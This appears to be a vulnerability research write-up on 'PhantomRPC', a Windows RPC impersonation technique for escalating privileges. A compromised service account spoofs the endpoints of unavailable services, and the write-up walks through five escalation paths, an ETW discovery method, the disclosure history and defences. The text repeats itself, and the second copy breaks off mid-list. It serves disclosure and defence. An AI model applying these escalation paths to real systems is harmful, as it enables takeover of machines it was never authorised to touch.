Reading view

PhantomRPC: A new privilege escalation technique in Windows RPC

Intro

Windows Interprocess Communication (IPC) is one of the most complex technologies within the Windows operating system. At the core of this ecosystem is the Remote Procedure Call (RPC) mechanism, which can function as a standalone communication channel or as the underlying transport layer for more advanced interprocess communication technologies. Because of its complexity and widespread use, RPC has historically been a rich source of security issues. Over the years, researchers have identified numerous vulnerabilities in services that rely on RPC, ranging from local privilege escalation to full remote code execution.

In this research, I present a new vulnerability in the RPC architecture that enables a novel local privilege escalation technique likely in all Windows versions. This technique enables processes with impersonation privileges to elevate their permissions to SYSTEM level. Although this vulnerability differs fundamentally from the “Potato” exploit family, Microsoft has not issued a patch despite proper disclosure.

I will demonstrate five different exploitation paths that show how privileges can be escalated from various local or network service contexts to SYSTEM or high-privileged users. Some techniques rely on coercion, some require user interaction and some take advantage of background services. As this issue stems from an architectural weakness, the number of potential attack vectors is effectively unlimited; any new process or service that depends on RPC could introduce another possible escalation path. For this reason, I also outline a methodology for identifying such opportunities.

Finally, I examine possible detection strategies, as well as defensive approaches that can help mitigate such attacks.

MSRPC

Microsoft RPC (Remote Procedure Call) is a Windows technology that enables communication between two processes. It enables one process to invoke functions that are implemented in another process, even though they are running in different execution contexts.

The figure below illustrates this mechanism.

Let us assume that Host A is running two processes: Process A and Process B. Process B needs to execute a function that resides inside Process A. To enable this type of interaction, Windows provides the Remote Procedure Call (RPC) architecture, which follows a client–server model. In this model, Process A acts as the RPC server, exposing its functionality through an interface, in our example, Interface A. Each RPC interface is uniquely identified by a Universally Unique Identifier (UUID), which is represented as a 128-bit value. This identifier enables the operating system to distinguish one interface from another.

The interface defines a set of functions that can be invoked remotely by the RPC client implemented in Process B. In our example, the interface exposes two functions: Fun1 and Fun2.

To communicate with the server, the RPC client must establish a connection through a communication endpoint. An endpoint represents the access point that enables transport between the client and the server. Because RPC supports multiple transport mechanisms, different endpoint types may exist, depending on the underlying transport.

For example:

  • When TCP is used as the transport layer, the endpoint is a TCP port.
  • When SMB is used, communication occurs through a named pipe.
  • When ALPC is used, the endpoint is an ALPC port.

Each transport mechanism is associated with a specific RPC protocol sequence. For instance:

  • ncacn_ip_tcp is used for RPC over TCP.
  • ncacn_np is used for RPC over named pipes.
  • ncalrpc is used for RPC over ALPC.

In this research, I focus specifically on Advanced Local Procedure Call (ALPC) as the RPC transport mechanism. ALPC is a Windows interprocess communication mechanism that predates MSRPC. Today, RPC can leverage ALPC as an efficient transport layer for communication between processes located on the same machine.

For simplicity, an ALPC port can be thought of as a communication channel similar to a file, where processes can send messages by writing to it, and receive messages by reading from it.

When the client wants to invoke a remote function, for example, Fun1, it must construct an RPC request. This request includes several important pieces of information, such as the interface UUID, the protocol sequence, the endpoint, and the function identifier. In RPC, functions are not referenced by name, but by a numerical identifier called the operation number (OPNUM). Depending on the requirements of the call, the request may also contain additional structures, such as security-related information.

Impersonation in Windows

In Windows, impersonation enables a service to temporarily operate using another user’s security context. For example, a service may need to open a file that belongs to a user while performing a specific operation. By impersonating the calling user, the system allows the service to access that file, even if the service itself would not normally have permission to do so. You can read more about impersonation in James Forshaw’s book Windows Security Internals.

This research focuses specifically on RPC impersonation. Instead of describing the interaction as a service and a user, I refer to the participants as a client and a server. In this model, the RPC server may temporarily adopt the identity of the client that initiated the request.

To perform this operation, the RPC server can call the RpcImpersonateClient API, which causes the server thread to execute under the client’s security context.

However, in some situations, a client may not want the server to be able to impersonate its identity. To control this behavior, Windows introduces the concept of an impersonation level. This defines how much authority the client grants the server to act on its behalf.

These settings are defined as part of the Security Quality of Service (SQOS) parameters, specified using the SECURITY_QUALITY_OF_SERVICE structure.

As you can see, this structure contains the impersonation level field, which determines the extent to which the server can assume the client’s identity.

Impersonation levels range from Anonymous, where the server cannot impersonate the client at all, to Impersonate and Delegate, which allow the server to act fully on behalf of the client.

At the same time, not every server process is allowed to impersonate a client. If any process could perform impersonation freely, it would pose a serious security risk. To prevent this, Windows requires the server process to possess a specific privilege called SeImpersonatePrivilege. Only processes with this privilege can successfully impersonate a client.

This privilege is granted by default to certain service accounts, such as Local Service and Network Service.

Interaction between Group Policy service and TermService

The Group Policy Client service (gpsvc) is a core Windows service responsible for applying and enforcing group policy settings on a system. It runs under the SYSTEM account inside svchost.exe.

When a group policy update is triggered, Windows uses an executable called gpupdate.exe. This tool can be executed with the /force flag to force an immediate refresh of all group policy settings. Internally, this executable communicates with the Group Policy service, which coordinates the update process.

At a certain stage during this operation, the Group Policy service attempts to communicate with TermService (Terminal Service, the Remote Desktop Services service) using RPC.

TermService is responsible for providing remote desktop functionality. This service is not running by default and can be enabled manually by the administrator via activation of Remote Desktop access. When this happens, the service exposes an RPC server with multiple interfaces and endpoints. TermService runs under the NT AUTHORITY\Network Service account.

When the command gpupdate /force is executed, the Group Policy service performs an RPC call to the TermService using the following parameters:

  • UUID: bde95fdf-eee0-45de-9e12-e5a61cd0d4fe.
  • Endpoint: ncalrpc:[TermSrvApi].
  • Function: void Proc8(int).

However, because TermService is disabled by default, the RPC call fails and an exception occurs in rpcrt4.dll (the RPC runtime). The returned error is:

  • 0x800706BA (RPC_S_SERVER_UNAVAILABLE, 1722).

This error indicates that the RPC client could not reach the target server.

Tracing the failure path further reveals that the root cause originates from a call to NtAlpcConnectPort, which is used by RPC to establish an ALPC connection between processes.

The NtAlpcConnectPort function is responsible for connecting to a specific ALPC port and returning a handle that the client can use for further communication. This function accepts multiple parameters.

The first two parameters include:

  • A pointer to the returned port handle.
  • The ALPC port name, represented as an ASCII string.

Another important argument is PortAttributes, which is an ALPC_PORT_ATTRIBUTES structure. Inside this structure is the SECURITY_QUALITY_OF_SERVICE structure, which, as mentioned above, defines the impersonation level used for the connection.

The final parameter of interest is RequiredServerSid, which specifies the expected identity of the target server process. This identity is represented using a Security Identifier (SID) structure.

Inspecting this call reveals that the Group Policy service attempts to connect to the RPC server using an impersonation level of Impersonate, expecting the remote server to run under the Network Service account. This behavior makes sense because TermService normally runs under Network Service.

Based on all the information above, the following scheme can be created to illustrate the interaction between TermService and gpsvc.

Up to this point, nothing unusual has occurred. An RPC client attempts to connect to an RPC server that is unavailable, resulting in an exception handled by the RPC runtime.

However, an interesting question arises: What if an attacker compromises a service that runs under the Network Service identity and mimics the exact RPC server exposed by TermService?

Could the attacker deploy a fake RPC server with the same endpoint?

If so, would the RPC runtime allow the client to connect to this illegitimate server?

And if the connection is successful, how could an attacker leverage this behavior?

Coercing the Group Policy service

To better understand the implications of the previously described behavior, let us consider the following attack scenario.

Imagine an attacker has compromised a service running on the system under the Network Service account, for example, an IIS server operating under the Network Service account. With this level of access, the attacker can deploy a malicious RPC server.

The attacker’s RPC server is designed to mimic the RPC interface exposed by the Remote Desktop service (TermService). Specifically, it implements the same RPC interface UUID and exposes the same endpoint name: TermSrvApi. Once deployed, the malicious server listens for RPC requests that would normally be directed to the legitimate RDP service.

Next, the attacker coerces the Group Policy service by triggering a policy update using gpupdate.exe /force. This causes the Group Policy Client service, which runs under the SYSTEM account, to perform the previously described RPC call. As observed earlier, this RPC call uses a high impersonation level (Impersonate).

When the attacker’s fake RPC server receives the request, it calls RpcImpersonateClient. This enables the server thread to impersonate the security context of the calling client, which, in this case, is SYSTEM.

As a result, the attacker can elevate privileges from Network Service to SYSTEM. In our proof-of-concept implementation, the exploit demonstrates privilege escalation by spawning a SYSTEM-level command prompt.

When this attack scenario was first discussed, it was purely theoretical. However, after implementing the malicious RPC server, the experiment confirmed that Windows allowed the server to be deployed and started successfully, and that the RPC runtime permitted the client to connect to the malicious endpoint. This made it possible to reliably escalate privileges from Network Service to SYSTEM using this technique. For this attack to succeed, though, at least one group policy must be applied on the system.

RPC architecture flow

Further investigation revealed that many Windows services attempt to communicate with TermService using RPC. These RPC calls often originate from winsta.dll, which acts as the RPC client component.

Windows processes invoke APIs exposed by winsta.dll; these APIs rely internally on RPC communication with TermService. This pattern is common in Windows; many system DLLs use RPC behind the scenes when their exported APIs are called.

However, it appears that the RPC runtime (rpcrt4.dll) does not provide a mechanism to verify the legitimacy of RPC servers. Moreover, Windows allows another process to deploy an RPC server that exposes the same endpoint as a legitimate service.

As a result, this architectural design introduces a large attack surface because RPC is heavily used across numerous system DLLs. Applications that invoke seemingly benign APIs may unintentionally trigger privileged RPC interactions. Under certain conditions, these interactions could be abused to achieve local privilege escalation without the user’s knowledge.

Identifying RPC calls to unavailable servers

As the issue appears to stem from an architectural weakness, a systematic approach is needed to identify RPC clients attempting to communicate with servers that are unavailable. First, I need a platform capable of monitoring RPC activity and extracting relevant information from each RPC request.

Specifically, I need to capture key RPC metadata, including:

  • Interface UUID, endpoint, and OPNUM.
  • Impersonation level and RPC status code.
  • Client process privilege level, process name, and module path.

This information is critical because it enables me to reconstruct the RPC interaction, mimic the expected RPC server, and determine how the call is triggered.

The platform that provides this capability is Event Tracing for Windows (ETW). ETW is a built-in Windows logging framework that captures both kernel-mode and user-mode events in real time.

Windows provides a tool called logman to collect ETW data. It enables us to create trace sessions, select event providers, and configure the verbosity level of the tracing process. The collected tracing data is stored in an .etl file, which can later be analyzed using tools such as Event Viewer or other ETW analysis utilities.

ETW provides deep visibility into RPC activity without requiring modifications to applications. Through ETW, it is possible to capture detailed RPC information, such as:

  • RPC bindings
  • Endpoints
  • Interface UUIDs
  • Authentication details
  • Call flow and timing
  • RPC status codes

However, I’m not interested in every RPC event. My focus is on RPC call failures, specifically those that return the status RPC_S_SERVER_UNAVAILABLE.

For an event to be relevant to this research, the exception must meet two conditions:

  • It must originate from a high-privileged process because impersonating such a process may allow an attacker to escalate privileges to a more powerful security context.
  • The RPC call must use a high impersonation level, enabling the server to fully impersonate the client once the connection is established.

I cannot rely solely on the raw ETW output to implement this framework because it contains thousands of events, making manual filtering with standard tools inefficient. Therefore, I need to automate this process. The workflow shown below enables me to efficiently filter and extract only those events that are relevant to this analysis.

After generating the logs as an .etl file, I convert them to JSON format using tools such as etw2json. JSON is a much easier format to process programmatically. In this case, I use a Python script to filter and extract the relevant information.

The filtering process begins with a search for Event ID 1, which corresponds to an RPC stop event. This event indicates that the RPC client has completed the call and the result is available. From this event, I can extract useful information, such as:

  • Status code
  • Client process name
  • Client process ID
  • Endpoint

After extracting the status code, I filter for the specific value RPC_S_SERVER_UNAVAILABLE, which indicates that the target server was unreachable during an RPC call. These events represent the scenarios that are of interest.

However, Event ID 1 does not contain all of the required RPC metadata. To obtain the missing information, it is correlated with Event ID 5, which represents the RPC start event. This event is generated when the client initiates the RPC call.

By matching the metadata between Event ID 1 and Event ID 5, I can recover the missing details, including:

  • Interface UUID
  • OPNUM
  • Impersonation level

After correlating and filtering these events, a JSON entry is obtained that is almost ready for analysis. At this stage, the data can be enriched further by adding context that will be helpful when reversing or analyzing the RPC server implementation. For example, the following can be identified:

  • The DLL where the RPC interface is implemented
  • The location of that DLL
  • The number of procedures exposed by the interface

To retrieve this information, I match the UUID with an external RPC interface database. In this case, I used the RPC database, which contains a comprehensive list of RPC interfaces and their corresponding DLL implementations.

At the end of this process, a complete JSON dataset is obtained that can be used for further analysis.

One important observation is that the RPC calls I am looking for may only occur when specific system actions are triggered. Additionally, the resulting exceptions may vary from one system to another depending on which services are enabled or disabled. Therefore, I need a reliable way to generate these RPC exceptions.

In this research, I used several approaches to trigger such events:

  1. Monitoring RPC activity during system startup
    I observed RPC activity while the system booted. During startup, many services initialize and perform various RPC calls, which increases the chances of capturing calls to unavailable servers.
  2. Triggering administrative operations
    I developed PowerShell scripts that perform common administrative tasks, such as updating Group Policy, changing network settings, or creating new users. These operations often trigger RPC communication and may generate exceptions.
  3. Disabling services intentionally
    After observing that Remote Desktop was disabled by default, I extended this idea by disabling additional services one by one and repeating the previous steps. This approach can reveal RPC clients that attempt to connect to services that are no longer available.

Additional privilege escalation paths

After running the logging and monitoring framework described earlier, I identified four additional scenarios that can lead to privilege escalation. The following sections introduce each case and explain how escalation can be achieved.

User interaction: From Edge to RDP

Microsoft Edge (msedge.exe) comes preinstalled on Windows systems. During startup, Edge triggers an RPC call to TermService. This RPC call is performed with a high impersonation level.

As previously discussed, Terminal Service is disabled by default. Because of this, the expected RPC server is unavailable, creating an opportunity for the attack scenario illustrated below.

The attack follows the same initial assumption as before: the attacker has already compromised a process running under the Network Service account. From there, they deploy the same malicious RPC server that mimics the legitimate TermService RPC interface.

However, unlike the previous scenario where the attacker coerced the Group Policy service, no coercion is required this time. Instead, the attacker simply waits for a high-privileged user, such as an administrator, to launch msedge.exe.

When Edge starts, it triggers the RPC client to attempt communication with the expected TermService RPC interface. Because the legitimate server is not running, the request is received by the attacker’s fake RPC server. Since the RPC call is made with a high impersonation level, the malicious server can call RpcImpersonateClient to impersonate the client process.

As a result, the attacker is able to impersonate the administrator-level client and escalate privileges from Network Service to Administrator.

Background services: From WDI to RDP

Some background Windows services periodically attempt to make RPC calls to the RDP service without user interaction. One such service is the WdiSystemHost service. The Diagnostic System Host Service (WDI) is a built-in Windows service that runs system diagnostics and performs troubleshooting tasks. This service runs under the SYSTEM account.

During normal operation, WDI periodically performs background RPC calls to the Remote Desktop service (TermService) using a high impersonation level. These RPC interactions occur automatically every 5–15 minutes and do not require any user input.

This behavior can be abused in a similar manner to the previous attack scenarios, as illustrated in the figure below.

In this case, however, no user interaction or coercion is required. After deploying a malicious RPC server that mimics the expected TermService RPC interface, the attacker only needs to wait for the WDI service to perform its periodic RPC call. Because the request is made with a high impersonation level, the malicious server can invoke RpcImpersonateClient and impersonate the calling process. This enables the attacker to escalate privileges to SYSTEM.

Abusing the Local Service account: From ipconfig to DHCP

Another scenario involves the DHCP Client service, which manages DHCP client operations on Windows systems. This service runs under the Local Service account and is enabled by default.

The DHCP Client service exposes an RPC server with multiple interfaces and endpoints. These interfaces are frequently invoked by various system DLLs, often using a high impersonation level.

In this scenario, instead of compromising a process running under Network Service, it is assumed the attacker has compromised a process running under the Local Service account. I also assume that the DHCP Client service is disabled, meaning the legitimate RPC server is unavailable.

As the figure below illustrates, the attacker can leverage this situation to escalate privileges.

After gaining control of a Local Service process, the attacker deploys a malicious RPC server that mimics the legitimate RPC server normally exposed by the DHCP Client service. Once the malicious server is running, the attacker waits for a high-privileged user, such as an administrator, to execute ipconfig.exe.

When ipconfig is run, it internally triggers an RPC request to the DHCP Client service. Since the legitimate RPC server is not running, the request is received by the attacker’s fake RPC server. Because the RPC call is performed with a high impersonation level, the malicious server can call RpcImpersonateClient to impersonate the client.

As a result, the attacker can escalate privileges from the Local Service account to the Administrator account.

Abusing Time

The Windows Time service (W32Time) is responsible for maintaining date and time synchronization across systems in a Windows environment. This service is enabled by default and runs under the Local Service account.

The service exposes an RPC server with two endpoints:

  • \PIPE\W32TIME_ALT
  • \RPC Control\W32TIME_ALT

The executable C:\Windows\System32\w32tm.exe interacts with the Windows Time service through RPC. However, before connecting to the valid RPC endpoints exposed by the service, the executable first attempts to access the nonexistent named pipe: \PIPE\W32TIME. This named pipe is not exposed by the legitimate W32Time service. However, if this endpoint were available, w32tm.exe would attempt to connect to it.

An attacker can abuse this behavior by deploying a malicious RPC server that mimics the legitimate RPC interface of the Windows Time service. Rather than exposing the legitimate endpoints, the attacker’s server exposes the nonexistent endpoint \PIPE\W32TIME, as shown in the figure below.

As in the previous scenarios, it is assumed the attacker has already compromised a process running under the Local Service account. The attacker then deploys a fake RPC server that implements the same RPC interface as the Windows Time service, but which exposes the alternative endpoint used by w32tm.exe.

Once the malicious server is running, the attacker simply waits for a high-privileged user, such as an administrator, to execute w32tm.exe. When the executable runs, it attempts to connect to the endpoint \PIPE\W32TIME. Because the attacker’s fake server exposes this endpoint, the RPC request is directed to the malicious server.

Since the RPC call is performed with a high impersonation level, the malicious server can impersonate the calling client. As a result, the attacker can escalate privileges from the Local Service account to the Administrator account.

In this scenario, it is important to note that the legitimate Windows Time service does not need to be disabled. Because the executable attempts to connect to a nonexistent endpoint, it is sufficient for the attacker to expose that endpoint through the malicious RPC server.

Vulnerability disclosure

After discovering the vulnerability, Kaspersky Security Services prepared a 10-page technical report describing the issue and the various aforementioned exploitation scenarios. The report was submitted to the Microsoft Security Response Center (MSRC) to report the vulnerability and request a fix.

Twenty days later, Microsoft responded, indicating that they did not classify the vulnerability as high severity. According to their assessment, the issue was classified as moderate severity and would therefore not be patched immediately. No CVE would be assigned, and the case would be closed without further tracking.

Microsoft explained that the moderate severity classification was due to the requirement that the originating process had to already possess the SeImpersonatePrivilege privilege. Since this privilege was typically required for the attack to succeed, Microsoft determined that the issue did not require immediate remediation.

Kaspersky Security Services respect Microsoft’s assessment and only published the research after the embargo period ends. In line with the coordinated vulnerability disclosure policy, Kaspersky Security Services will refrain from publishing detailed instructions that could enable or accelerate mass exploitation.

The disclosure timeline is shown below:

  • 2025-09-19: Vulnerability reported to Microsoft Security Response Center (Case 101749).
  • 2025-10-10: MSRC response – the case was assessed as moderate severity, not eligible for a bounty, no CVE was issued, and the case was closed without further tracking.
  • 2026-04-24: expected whitepaper publication date.

Detection and defense

As discussed above, this vulnerability is related to an architectural design behavior. Fully preventing it would require Microsoft to release a patch that addresses the underlying issue.

Nevertheless, organizations can still take steps to detect and mitigate potential abuse. ETW-based monitoring within the framework described above enables defenders to identify RPC exceptions in their environment, especially when RPC clients attempt to connect to unavailable servers.

I have provide the tools used in the previously described framework so that organizations can check their environment for such behavior. You can find all of them in the research repository.

By monitoring these events, administrators can identify situations where legitimate RPC servers are expected but not running. In some cases, the attack surface may be reduced by enabling the corresponding services, ensuring that the legitimate RPC server is available. This can hinder attackers from deploying malicious RPC servers that imitate legitimate endpoints.

It is also good practice to reduce the use of the SeImpersonatePrivilege privilege in processes where it is not required. Some system processes need this privilege for normal operations. However, granting it to custom processes is generally not considered good security practice.

Conclusion

All the exploits described in this research were tested on Windows Server 2022 and Windows Server 2025 with the latest available updates prior to the submission date. The proof-of-concept implementations can be found in the research repository. However, it is highly likely that this issue may also be exploitable on other Windows versions.

Because the vulnerability stems from an architectural design issue, there may be additional attack scenarios beyond those presented in this research. The exact exploitation paths may vary from one system to another depending on factors such as installed software, the DLLs involved in RPC communication, and the availability of corresponding RPC servers.

  •  

PhantomRPC: A new privilege escalation technique in Windows RPC

Intro

Windows Interprocess Communication (IPC) is one of the most complex technologies within the Windows operating system. At the core of this ecosystem is the Remote Procedure Call (RPC) mechanism, which can function as a standalone communication channel or as the underlying transport layer for more advanced interprocess communication technologies. Because of its complexity and widespread use, RPC has historically been a rich source of security issues. Over the years, researchers have identified numerous vulnerabilities in services that rely on RPC, ranging from local privilege escalation to full remote code execution.

In this research, I present a new vulnerability in the RPC architecture that enables a novel local privilege escalation technique likely in all Windows versions. This technique enables processes with impersonation privileges to elevate their permissions to SYSTEM level. Although this vulnerability differs fundamentally from the “Potato” exploit family, Microsoft has not issued a patch despite proper disclosure.

I will demonstrate five different exploitation paths that show how privileges can be escalated from various local or network service contexts to SYSTEM or high-privileged users. Some techniques rely on coercion, some require user interaction and some take advantage of background services. As this issue stems from an architectural weakness, the number of potential attack vectors is effectively unlimited; any new process or service that depends on RPC could introduce another possible escalation path. For this reason, I also outline a methodology for identifying such opportunities.

Finally, I examine possible detection strategies, as well as defensive approaches that can help mitigate such attacks.

MSRPC

Microsoft RPC (Remote Procedure Call) is a Windows technology that enables communication between two processes. It enables one process to invoke functions that are implemented in another process, even though they are running in different execution contexts.

The figure below illustrates this mechanism.

Let us assume that Host A is running two processes: Process A and Process B. Process B needs to execute a function that resides inside Process A. To enable this type of interaction, Windows provides the Remote Procedure Call (RPC) architecture, which follows a client–server model. In this model, Process A acts as the RPC server, exposing its functionality through an interface, in our example, Interface A. Each RPC interface is uniquely identified by a Universally Unique Identifier (UUID), which is represented as a 128-bit value. This identifier enables the operating system to distinguish one interface from another.

The interface defines a set of functions that can be invoked remotely by the RPC client implemented in Process B. In our example, the interface exposes two functions: Fun1 and Fun2.

To communicate with the server, the RPC client must establish a connection through a communication endpoint. An endpoint represents the access point that enables transport between the client and the server. Because RPC supports multiple transport mechanisms, different endpoint types may exist, depending on the underlying transport.

For example:

  • When TCP is used as the transport layer, the endpoint is a TCP port.
  • When SMB is used, communication occurs through a named pipe.
  • When ALPC is used, the endpoint is an ALPC port.

Each transport mechanism is associated with a specific RPC protocol sequence. For instance:

  • ncacn_ip_tcp is used for RPC over TCP.
  • ncacn_np is used for RPC over named pipes.
  • ncalrpc is used for RPC over ALPC.

In this research, I focus specifically on Advanced Local Procedure Call (ALPC) as the RPC transport mechanism. ALPC is a Windows interprocess communication mechanism that predates MSRPC. Today, RPC can leverage ALPC as an efficient transport layer for communication between processes located on the same machine.

For simplicity, an ALPC port can be thought of as a communication channel similar to a file, where processes can send messages by writing to it, and receive messages by reading from it.

When the client wants to invoke a remote function, for example, Fun1, it must construct an RPC request. This request includes several important pieces of information, such as the interface UUID, the protocol sequence, the endpoint, and the function identifier. In RPC, functions are not referenced by name, but by a numerical identifier called the operation number (OPNUM). Depending on the requirements of the call, the request may also contain additional structures, such as security-related information.

Impersonation in Windows

In Windows, impersonation enables a service to temporarily operate using another user’s security context. For example, a service may need to open a file that belongs to a user while performing a specific operation. By impersonating the calling user, the system allows the service to access that file, even if the service itself would not normally have permission to do so. You can read more about impersonation in James Forshaw’s book Windows Security Internals.

This research focuses specifically on RPC impersonation. Instead of describing the interaction as a service and a user, I refer to the participants as a client and a server. In this model, the RPC server may temporarily adopt the identity of the client that initiated the request.

To perform this operation, the RPC server can call the RpcImpersonateClient API, which causes the server thread to execute under the client’s security context.

However, in some situations, a client may not want the server to be able to impersonate its identity. To control this behavior, Windows introduces the concept of an impersonation level. This defines how much authority the client grants the server to act on its behalf.

These settings are defined as part of the Security Quality of Service (SQOS) parameters, specified using the SECURITY_QUALITY_OF_SERVICE structure.

As you can see, this structure contains the impersonation level field, which determines the extent to which the server can assume the client’s identity.

Impersonation levels range from Anonymous, where the server cannot impersonate the client at all, to Impersonate and Delegate, which allow the server to act fully on behalf of the client.

At the same time, not every server process is allowed to impersonate a client. If any process could perform impersonation freely, it would pose a serious security risk. To prevent this, Windows requires the server process to possess a specific privilege called SeImpersonatePrivilege. Only processes with this privilege can successfully impersonate a client.

This privilege is granted by default to certain service accounts, such as Local Service and Network Service.

Interaction between Group Policy service and TermService

The Group Policy Client service (gpsvc) is a core Windows service responsible for applying and enforcing group policy settings on a system. It runs under the SYSTEM account inside svchost.exe.

When a group policy update is triggered, Windows uses an executable called gpupdate.exe. This tool can be executed with the /force flag to force an immediate refresh of all group policy settings. Internally, this executable communicates with the Group Policy service, which coordinates the update process.

At a certain stage during this operation, the Group Policy service attempts to communicate with TermService (Terminal Service, the Remote Desktop Services service) using RPC.

TermService is responsible for providing remote desktop functionality. This service is not running by default and can be enabled manually by the administrator via activation of Remote Desktop access. When this happens, the service exposes an RPC server with multiple interfaces and endpoints. TermService runs under the NT AUTHORITY\Network Service account.

When the command gpupdate /force is executed, the Group Policy service performs an RPC call to the TermService using the following parameters:

  • UUID: bde95fdf-eee0-45de-9e12-e5a61cd0d4fe.
  • Endpoint: ncalrpc:[TermSrvApi].
  • Function: void Proc8(int).

However, because TermService is disabled by default, the RPC call fails and an exception occurs in rpcrt4.dll (the RPC runtime). The returned error is:

  • 0x800706BA (RPC_S_SERVER_UNAVAILABLE, 1722).

This error indicates that the RPC client could not reach the target server.

Tracing the failure path further reveals that the root cause originates from a call to NtAlpcConnectPort, which is used by RPC to establish an ALPC connection between processes.

The NtAlpcConnectPort function is responsible for connecting to a specific ALPC port and returning a handle that the client can use for further communication. This function accepts multiple parameters.

The first two parameters include:

  • A pointer to the returned port handle.
  • The ALPC port name, represented as an ASCII string.

Another important argument is PortAttributes, which is an ALPC_PORT_ATTRIBUTES structure. Inside this structure is the SECURITY_QUALITY_OF_SERVICE structure, which, as mentioned above, defines the impersonation level used for the connection.

The final parameter of interest is RequiredServerSid, which specifies the expected identity of the target server process. This identity is represented using a Security Identifier (SID) structure.

Inspecting this call reveals that the Group Policy service attempts to connect to the RPC server using an impersonation level of Impersonate, expecting the remote server to run under the Network Service account. This behavior makes sense because TermService normally runs under Network Service.

Based on all the information above, the following scheme can be created to illustrate the interaction between TermService and gpsvc.

Up to this point, nothing unusual has occurred. An RPC client attempts to connect to an RPC server that is unavailable, resulting in an exception handled by the RPC runtime.

However, an interesting question arises: What if an attacker compromises a service that runs under the Network Service identity and mimics the exact RPC server exposed by TermService?

Could the attacker deploy a fake RPC server with the same endpoint?

If so, would the RPC runtime allow the client to connect to this illegitimate server?

And if the connection is successful, how could an attacker leverage this behavior?

Coercing the Group Policy service

To better understand the implications of the previously described behavior, let us consider the following attack scenario.

Imagine an attacker has compromised a service running on the system under the Network Service account, for example, an IIS server operating under the Network Service account. With this level of access, the attacker can deploy a malicious RPC server.

The attacker’s RPC server is designed to mimic the RPC interface exposed by the Remote Desktop service (TermService). Specifically, it implements the same RPC interface UUID and exposes the same endpoint name: TermSrvApi. Once deployed, the malicious server listens for RPC requests that would normally be directed to the legitimate RDP service.

Next, the attacker coerces the Group Policy service by triggering a policy update using gpupdate.exe /force. This causes the Group Policy Client service, which runs under the SYSTEM account, to perform the previously described RPC call. As observed earlier, this RPC call uses a high impersonation level (Impersonate).

When the attacker’s fake RPC server receives the request, it calls RpcImpersonateClient. This enables the server thread to impersonate the security context of the calling client, which, in this case, is SYSTEM.

As a result, the attacker can elevate privileges from Network Service to SYSTEM. In our proof-of-concept implementation, the exploit demonstrates privilege escalation by spawning a SYSTEM-level command prompt.

When this attack scenario was first discussed, it was purely theoretical. However, after implementing the malicious RPC server, the experiment confirmed that Windows allowed the server to be deployed and started successfully, and that the RPC runtime permitted the client to connect to the malicious endpoint. This made it possible to reliably escalate privileges from Network Service to SYSTEM using this technique. For this attack to succeed, though, at least one group policy must be applied on the system.

RPC architecture flow

Further investigation revealed that many Windows services attempt to communicate with TermService using RPC. These RPC calls often originate from winsta.dll, which acts as the RPC client component.

Windows processes invoke APIs exposed by winsta.dll; these APIs rely internally on RPC communication with TermService. This pattern is common in Windows; many system DLLs use RPC behind the scenes when their exported APIs are called.

However, it appears that the RPC runtime (rpcrt4.dll) does not provide a mechanism to verify the legitimacy of RPC servers. Moreover, Windows allows another process to deploy an RPC server that exposes the same endpoint as a legitimate service.

As a result, this architectural design introduces a large attack surface because RPC is heavily used across numerous system DLLs. Applications that invoke seemingly benign APIs may unintentionally trigger privileged RPC interactions. Under certain conditions, these interactions could be abused to achieve local privilege escalation without the user’s knowledge.

Identifying RPC calls to unavailable servers

As the issue appears to stem from an architectural weakness, a systematic approach is needed to identify RPC clients attempting to communicate with servers that are unavailable. First, I need a platform capable of monitoring RPC activity and extracting relevant information from each RPC request.

Specifically, I need to capture key RPC metadata, including:

  • Interface UUID, endpoint, and OPNUM.
  • Impersonation level and RPC status code.
  • Client process privilege level, process name, and module path.

This information is critical because it enables me to reconstruct the RPC interaction, mimic the expected RPC server, and determine how the call is triggered.

The platform that provides this capability is Event Tracing for Windows (ETW). ETW is a built-in Windows logging framework that captures both kernel-mode and user-mode events in real time.

Windows provides a tool called logman to collect ETW data. It enables us to create trace sessions, select event providers, and configure the verbosity level of the tracing process. The collected tracing data is stored in an .etl file, which can later be analyzed using tools such as Event Viewer or other ETW analysis utilities.

ETW provides deep visibility into RPC activity without requiring modifications to applications. Through ETW, it is possible to capture detailed RPC information, such as:

  • RPC bindings
  • Endpoints
  • Interface UUIDs
  • Authentication details
  • Call flow and timing
  • RPC status codes

However, I’m not interested in every RPC event. My focus is on RPC call failures, specifically those that return the status RPC_S_SERVER_UNAVAILABLE.

For an event to be relevant to this research, the exception must meet two conditions:

  • It must originate from a high-privileged process because impersonating such a process may allow an attacker to escalate privileges to a more powerful security context.
  • The RPC call must use a high impersonation level, enabling the server to fully impersonate the client once the connection is established.

I cannot rely solely on the raw ETW output to implement this framework because it contains thousands of events, making manual filtering with standard tools inefficient. Therefore, I need to automate this process. The workflow shown below enables me to efficiently filter and extract only those events that are relevant to this analysis.

After generating the logs as an .etl file, I convert them to JSON format using tools such as etw2json. JSON is a much easier format to process programmatically. In this case, I use a Python script to filter and extract the relevant information.

The filtering process begins with a search for Event ID 1, which corresponds to an RPC stop event. This event indicates that the RPC client has completed the call and the result is available. From this event, I can extract useful information, such as:

  • Status code
  • Client process name
  • Client process ID
  • Endpoint

After extracting the status code, I filter for the specific value RPC_S_SERVER_UNAVAILABLE, which indicates that the target server was unreachable during an RPC call. These events represent the scenarios that are of interest.

However, Event ID 1 does not contain all of the required RPC metadata. To obtain the missing information, it is correlated with Event ID 5, which represents the RPC start event. This event is generated when the client initiates the RPC call.

By matching the metadata between Event ID 1 and Event ID 5, I can recover the missing details, including:

  • Interface UUID
  • OPNUM
  • Impersonation level

After correlating and filtering these events, a JSON entry is obtained that is almost ready for analysis. At this stage, the data can be enriched further by adding context that will be helpful when reversing or analyzing the RPC server implementation. For example, the following can be identified:

  • The DLL where the RPC interface is implemented
  • The location of that DLL
  • The number of procedures exposed by the interface

To retrieve this information, I match the UUID with an external RPC interface database. In this case, I used the RPC database, which contains a comprehensive list of RPC interfaces and their corresponding DLL implementations.

At the end of this process, a complete JSON dataset is obtained that can be used for further analysis.

One important observation is that the RPC calls I am looking for may only occur when specific system actions are triggered. Additionally, the resulting exceptions may vary from one system to another depending on which services are enabled or disabled. Therefore, I need a reliable way to generate these RPC exceptions.

In this research, I used several approaches to trigger such events:

  1. Monitoring RPC activity during system startup
    I observed RPC activity while the system booted. During startup, many services initialize and perform various RPC calls, which increases the chances of capturing calls to unavailable servers.
  2. Triggering administrative operations
    I developed PowerShell scripts that perform common administrative tasks, such as updating Group Policy, changing network settings, or creating new users. These operations often trigger RPC communication and may generate exceptions.
  3. Disabling services intentionally
